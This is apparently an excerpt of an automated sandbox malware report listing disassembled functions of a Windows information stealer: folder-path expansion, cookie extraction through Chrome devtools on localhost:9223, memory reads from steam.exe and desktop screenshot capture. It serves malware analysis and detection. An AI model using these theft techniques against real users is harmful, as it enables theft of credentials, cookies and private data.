                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                      • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                      • API String ID: 348468850-2422389115
                                                                                                                                                                                                                                                                                      • Opcode ID: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                      • Instruction ID: af6f1e03352f6f9f1d8fae1c75086c49a28638e44c42a35a98b4b473fe3f47e4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1E1AF70204308AFD324AF25D895FABB3A9BB44344F04445EFD179B292DB7CE985CB69
                                                                                                                                                                                                                                                                                      Function 00412F60 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 374stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,?,?,00000000,?,?,00000000,?,?,00000000,00000000), ref: 00413081
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%DESKTOP%,00000000,?,00000010,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130AE
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%APPDATA%,00000000,?,0000001A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130DA
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%LOCALAPPDATA%,00000000,?,0000001C,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413106
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%USERPROFILE%,00000000,?,00000028,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413132
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%DOCUMENTS%,00000000,?,00000005,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041315E
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES%,00000000,?,00000026,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041318A
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES_86%,00000000,?,0000002A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131B6
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%RECENT%,00000000,?,00000008,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131E2
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,true,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00413268
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,false,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041327D
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0041301C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$strtok_s$FolderPathlstrlen
                                                                                                                                                                                                                                                                                      • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                      • API String ID: 1330363096-2422389115
                                                                                                                                                                                                                                                                                      • Opcode ID: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                      • Instruction ID: f18559b84add82ea06590c7feb2660792e730a2b0798f24fd2155c98f040b140
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91C1AF70604308AFD214AF25DC95FABB3A9BB44348F00445EFD179B292DB7CA985CB69
                                                                                                                                                                                                                                                                                      Function 00406AA0 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 416COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpy
                                                                                                                                                                                                                                                                                      • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                      • API String ID: 1695611338-4155744131
                                                                                                                                                                                                                                                                                      • Opcode ID: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                      • Instruction ID: b745cebb343ebaf7917439795664f4dc5ec349037e75ec0584470be98ece6274
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D105B1A002145BDB24DF64DD84AAFB775EF41308F11052EF903A72C2DB7CAD958B99
                                                                                                                                                                                                                                                                                      Function 0040FD50 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 324stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FE01
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F9B0: strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F9B0: ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F9B0: memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F9B0: VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FF1E
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040FF84
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000012E,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 0040FFC4
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 00410037
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410044
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                      • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??3@memset$Processstrlen$MemoryOpenQueryReadVirtual_invalid_parameter_noinfo_noreturnmemcpystrcpy
                                                                                                                                                                                                                                                                                      • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73$@Gc$N0ZWFt$steam.exe
                                                                                                                                                                                                                                                                                      • API String ID: 2915318159-3068576885
                                                                                                                                                                                                                                                                                      • Opcode ID: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                      • Instruction ID: 0ac8410772c06d3c7cd158b0f29ba11351ce6fbe5d6182cbcead23e9eae0fd7c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AA125B16043015BDB20AA24DD84BAFBAD5AF41304F10093FF946976C2E7BD99C8839E
                                                                                                                                                                                                                                                                                      Function 00411760 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041179A
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004117A8
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004117B5
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004117E2
                                                                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00411847
                                                                                                                                                                                                                                                                                      • StrCmpCW.SHLWAPI(?,image/jpeg), ref: 00411878
                                                                                                                                                                                                                                                                                      • GetHGlobalFromStream.COMBASE(?,00000000), ref: 004118E2
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004118EB
                                                                                                                                                                                                                                                                                      • GlobalSize.KERNEL32(00000000), ref: 004118FF
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00411964
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00417FAE), ref: 0041197F
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00411986
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00411993
                                                                                                                                                                                                                                                                                      • CloseWindow.USER32(?), ref: 0041199A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSizemalloc
                                                                                                                                                                                                                                                                                      • String ID: image/jpeg$screenshot.jpg
                                                                                                                                                                                                                                                                                      • API String ID: 290954413-3715547155
                                                                                                                                                                                                                                                                                      • Opcode ID: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                      • Instruction ID: ee18476c3b49a6e7ea655472561b7fd097213a4b83d20557ae7d52cec962e0ac
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6713D71900619EFDF04AFA0DD89AEEBB79FF08304F005019FA16A7161DB759985CBE4
                                                                                                                                                                                                                                                                                      Function 004132F0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 146stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                                                      • String ID: block$|
                                                                                                                                                                                                                                                                                      • API String ID: 3407564107-542838162
                                                                                                                                                                                                                                                                                      • Opcode ID: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
